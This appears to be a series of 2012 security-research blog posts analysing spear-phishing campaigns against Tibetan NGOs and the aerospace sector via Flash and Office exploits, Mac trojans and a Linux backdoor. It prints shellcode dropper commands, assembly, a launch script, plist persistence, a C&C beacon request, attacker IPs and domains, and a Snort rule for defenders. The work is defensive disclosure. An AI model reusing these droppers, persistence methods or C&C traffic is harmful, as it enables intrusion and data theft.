A couple of days ago, Adobe issued a security update for Adobe Flash Player that has been detected in the wild targeting specific objectives.

Several spear phishing campaigns have been detected. The mails sent contain a Word document attachment. It contains a reference to a Flash file that is downloaded from a remote server once the document is opened. This Flash file exploits the CVE-2012-0779 vulnerability triggering a shellcode that looks for the payload within the original word document. The payload is decoded using a one byte XOR scheme, dropped on the system and then executed.

Most of the malicious Flash files have low AV detection rates so it is very important to apply the vendor’s patch.

We have seen several documents sent to a wide range of industries as well as Tibet related NGO’s. Some examples are:

Once the victim opens the document, the malicious Flash file is downloaded from a remote server:

In the vast majority of the documents we have analyzed, the malicious files are hosted on hacked websites.

We will release more information as well as IDS signatures to detect some of the payloads we have seen so far.

The number of samples exploiting CVE-2012-0158 has been growing since we reported some of the first infections last week. We have been detecting several ongoing campaigns against several industries. One of the campaigns which attracted our attention is targeting the military and aerospace industry.

Some of the documents sent to the victims have still a low antivirus detection. For example, one of the files sent is called “SMD_Conference_2012.doc”.

https://www.virustotal.com/file/b2b2091ed7d211b713353affa7e4e6585ae8abbbc8fc3eede74d0c93f39a7f6b/analysis/

When the victim opens the malicious document, the shellcode drops the malware and a benign office file, then it executes the dropped binary and shows the office file:

cmd /c echo MZ>log1.txt && cmd /c copy /b log1.txt+fabc.scr abc.scr && cmd /c abc.scr && cmd /c del log1.txt && cmd /c del fabc.scr

cmd /c SMD_Conference2012.doc

So the victim will show the following document:

The binary created by the shellcode is a dropper that contains the actual malware embedded on a resource. After deciphering the content, it creates the new binary under \Documents and Settings\{UserName}\Local Settings\Application Data\GoogleUpdate.exe and creates the following registry key in order to maintain persistence:

\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN

GoogleUpd SZ \”C:\\Documents and Settings\\Joe Maldive\\Local Settings\\Application Data\\GoogleUpdate.exe\”

The payload is detected as BKDR_FYNLOS.SM1 and has been used in order similar attacks in the past. The malware connects to the  C&C server with address 204.13.66.119.

The following HTTP request is sent to the C&C server:

GET /search54615?h1=51&h2=1&h3=fh17952&h4=FNFACAADHFBCEIFJFEFGFAAA HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (compatible;AEAFAKEBFDENBMECAOAHFCAEABBDEJ;)
Host: 204.13.66.119
Connection: Keep-Alive

The values sent are the operating system version (5.1 = Windows XP), the encoded serial number of the machine and the encoded version of the machine name.

It seems to be a version of the trojan called MSUpdater that was described by Zscaler a few months ago.  Once again the group behind these attacks are using conference related subjects as a lure to target these industries.

You can use the following snort rule already present on Emerging Threats to detect the C&C traffic:

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:”ET TROJAN Win32/Cryptrun.B/MSUpdater C&C traffic 1″; flow:from_client,established; content:”/search”; http_uri; content:”?h1=”; fast_pattern; http_uri; content:”&h2=”; distance:0; http_uri; content:”&h3=”; distance:0; http_uri; content:”User-Agent|3a| Mozilla/5.0 (compatible|3B|”; http_header; reference:url,blog.9bplus.com/kim-jong-il-pdf-malware; reference:url,www.seculert.com/reports/MSUpdaterTrojanWhitepaper.pdf; reference:url,research.zscaler.com/2012/01/msupdater-trojan-and-link-to-targeted.html; reference:url,blog.seculert.com/2012/01/msupdater-trojan-and-conference-invite.html; classtype:trojan-activity; sid:2014174; rev:4;)

As our friends at TrendMicro reported a couple of days ago that CVE-2012-0158 is being actively used on different spearphishing campaigns mainly against NGO’s and Tibet related organizations.

The vulnerability used was patched by Microsoft a week ago:

The (1) ListView, (2) ListView2, (3) TreeView, and (4) TreeView2 ActiveX controls in MSCOMCTL.OCX in the Common Controls in Microsoft Office 2003 SP3, 2007 SP2 and SP3, and 2010 Gold and SP1; Office 2003 Web Components SP3; SQL Server 2000 SP4, 2005 SP4, and 2008 SP2, SP3, and R2; BizTalk Server 2002 SP1; Commerce Server 2002 SP4, 2007 SP2, and 2009 Gold and R2; Visual FoxPro 8.0 SP1 and 9.0 SP2; and Visual Basic 6.0 Runtime allow remote attackers to execute arbitrary code via a crafted (a) web site, (b) Office document, or (c) .rtf file that triggers “system state” corruption, as exploited in the wild in April 2012, aka “MSCOMCTL.OCX RCE Vulnerability.”

We have found several targeted RTF doc files dropping different trojans and RATs onto the victims. One of the malicious doc files is very similar to what TrendMicro described a couple of days ago but it shows how quick the attackers are adapting their code to what security companies release in order to avoid signature and AV detection.

Once you open the RTF document, it drops the malicious executable as well as a benign doc file:

Immolation Statement.doc

The dropped exe file has a low AV detection rate:

https://www.virustotal.com/file/b7c6522ce21bd230c33e3f250d9789395af932e7fc72c9e0c1304c0bbcaa5e61/analysis/1334789684/

https://www.virustotal.com/file/eb6901caaf90e7e04b5c79d33aaa4aa3f3139cfb179418f78555e0c724b9e09f/analysis/1334790589/

And more interesting is that it is digitally signed, apparently using the same signer described by TrendMicro but this time the certificate is valid and it has been signed the 16th.

The trojan connects to the following domains:

• 1.test.3322.org.cn -> 64.62.224.75
• 2.test.3322.org.cn -> 74.82.63.102
• 3.test.3322.org.cn -> 74.82.63.102
• 4.test.3322.org.cn -> 64.62.224.75
• 123ewqasdcxz.xicp.net, now pointing to 0.0.0.0
• hoop-america.oicp.net -> 222.132.195.5

We have collected several documents/mails exploiting CVE-2012-0158 and will publish more information about the ongoing campaigns. Stay tuned!

We were working on some information related to the C&C protocol used on the Mac OS X trojan we discovered last week. ESET already did a great job and you can read all the information there. As ESET said, the C&C protocol is using AES and XOR to encrypt all the underlying communications. For the XOR cypher they are using hardcoded keys:

They also add a SHA1 hash to every packet to authenticate and check the integrity of the communication.

So based on the encryption method, we have found another backdoor that uses the same underlying encryption with the same keys on a Linux backdoor that has been around at least since lately 1999 (based on VirusTotal submissions).

This can indicate that they are taking advantage of some code published in some underground forums or maybe the same guys have been using this backdoor to maintain persistence on Linux systems.

The file in question is this one:

https://www.virustotal.com/file/a3ffc25db2403b3f70719b151b106e53b3abbf1f81c9147a40664605b5b573d7/analysis/

The backdoor:

- It check first that has enough privileges to run (it requires root privileges).

- Then it writes the PID number to a file under /dev/hdsmat.

- Forks the process and change the process name to ‘-bash’.

- Opens a raw socket, SOCKET (PF_INET, SOCK_RAW, IPPROTO_TCP)

- This is some kind of portknocking technique so it waits for a packet that contains the following string:

- Once it receives that packet, it opens a connection to the machine that sent the pack using port 3133.

- The following communication will use the same XOR/AES underlying encryption to exchange data.

Based on a post published lately last year, it seems that they found a similar backdoor that was uploaded to the system after a successful SSH bruteforcing attack. The backdoor they talk about doesn’t have the underlying encryption but it uses the same “portknocking” code.

Maybe someone recognizes parts of this code and points us to an already know backdoor.

Continuing our research on Tibet attacks, we have found more Mac trojans and some interesting MS Office files that  deliver them. The group behind these attacks is the same we have been tracking for a while:

- AlienVault Tibet related Research now used to target Tibetan non-governmental organizations

We believe this group is also the same as the group TrendMicro uncovered some days ago:

- Malicious Email Campaign Uses Current Socio-Political Events as Lure for Targeted Attack

The doc files seem to exploit MS09-027 and target Microsoft Office for Mac. This is one of the few times that we have seen a malicious Office file used to deliver Malware on Mac OS X.

http://technet.microsoft.com/en-us/security/bulletin/MS09-027

A remote code execution vulnerability exists in the way that Microsoft Office Word handles a specially crafted Word file that includes a malformed record. An attacker who successfully exploits this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.

When the victim opens the malicious Word file using Office for Mac, the shellcode writes the malicious payload on disk and executes it, and then opens a benign office file with the following content:

The first stage copies the payload to the __IMPORT section of dyld using memcpy:

push dword 0x1be #Payload size
push edx
push dword 0x8fe6f318
push dword 0x8fe6f318 ## dyld __IMPORT (rwx) mov ebx,0x8fe2e130 #memcpy

jmp ebx

The second stage writes necessary files to /tmp/ (bash file, benign doc file, binary) and then executes the bash script (/tmp/launch-hs):

fstat(0×2, 0xBFFF4CD0, 0×200)
…
fstat(0×24, 0xBFFF4CD0, 0×200)
lseek(0×24, 0×6600, 0×0) #File Offset on the doc file
open(“/tmp/launch-hs\0″, 0×602, 0x1FF)
open(“/tmp/launch-hse\0″, 0×602, 0x1FF)
open(“/tmp/file.doc\0″, 0×602, 0x1FF)

read(0×24, “#!/bin/sh\n/tmp/launch-hse &\nopen /tmp/file.doc &\n\n\0″, 0×32)
write(0×26, “#!/bin/sh\n/tmp/launch-hse &\nopen /tmp/file.doc &\n\n\0″, 0×32) …
…

…
close(0×28)
vfork()
execve(0×28, 0xBFFF4B80, 0×0)

Bash file: /tmp/launch-hs:

#!/bin/sh /tmp/launch-hse & open /tmp/file.doc &

A couple of doc files drop the previous Mac Trojan we reported last week.

The only difference is the .pslist used:

<?xml version=”1.0″ encoding=”UTF-8″?>
<!DOCTYPE plist PUBLIC “-//Apple Computer//DTD PLIST 1.0//EN” “http:// www.apple.com/DTDs/PropertyList-1.0.dtd”>
<plist version=”1.0″>
<dict>

<key>Label</key> <string>com.apple.docserver</string> <key>Program</key>

<string> /Applications/Automator.app/Contents/MacOS/DockLight </string>
<key>RunAtLoad</key>
<true/>
</dict>
</plist>

The C&C server this time is:

- 2012.slyip.net : 173.255.160.234

173.255.160.128 – 173.255.160.255

Black Oak Computers Inc – New York – 75 Broad Street

New York, NY, US

The second trojan found is a new one never seen. We have found several versions compiled for different architectures (ppc, i386..) .We have also found a version that has paths to debugging symbols:

/Developer/longgegeProject/Mac Control/MacControl V1.1.1/build/Foundation_Hello.build/ Release/Foundation_Hello.build/Objects-normal/ppc/Foundation_Hello.o

/Developer/longgegeProject/Mac Control/MacControl V1.1.1/build/Foundation_Hello.build/ Release/Foundation_Hello.build/Objects-normal/i386/Foundation_Hello.o

So the group seems to have a project called “longgege” and the actual trojan is named “MacControl” by them.

The trojan performs the following actions:

- Copies itself into /Library/launched
- Creates /Users/{User}/Library/LaunchAgents/com.apple.FolderActionxsl.pslist

This is the way to maintain persistence. The trojan will be executed when the computer starts.

- It then reads the configuration parameters that are at the end of the binary file:

• - domain: freetibet2012.xicp.net – port: 80

- Establishes a connection to the host present in the configuration parameters.

-Sends some information about the victim, username, hostname, system version…

- The trojan will then wait for commands from the C&C.

The attackers can then send commands to the victim to open a remote shell, send files, receive files, delete files….

The C&C domain resolves to freetibet2012.xicp.net: 114.249.207.194

114.240.0.0 – 114.255.255.255
China Unicom Beijing province network

China Unicom

All the samples we have found have 0/0 rate antivirus detection, it includes the malicious doc files.

We will publish a technical analysis of the trojan capabilities and some tips to detect these threats. Stay tuned!

Thanks to Rubén Santamarta @reversemode for his help during the analysis.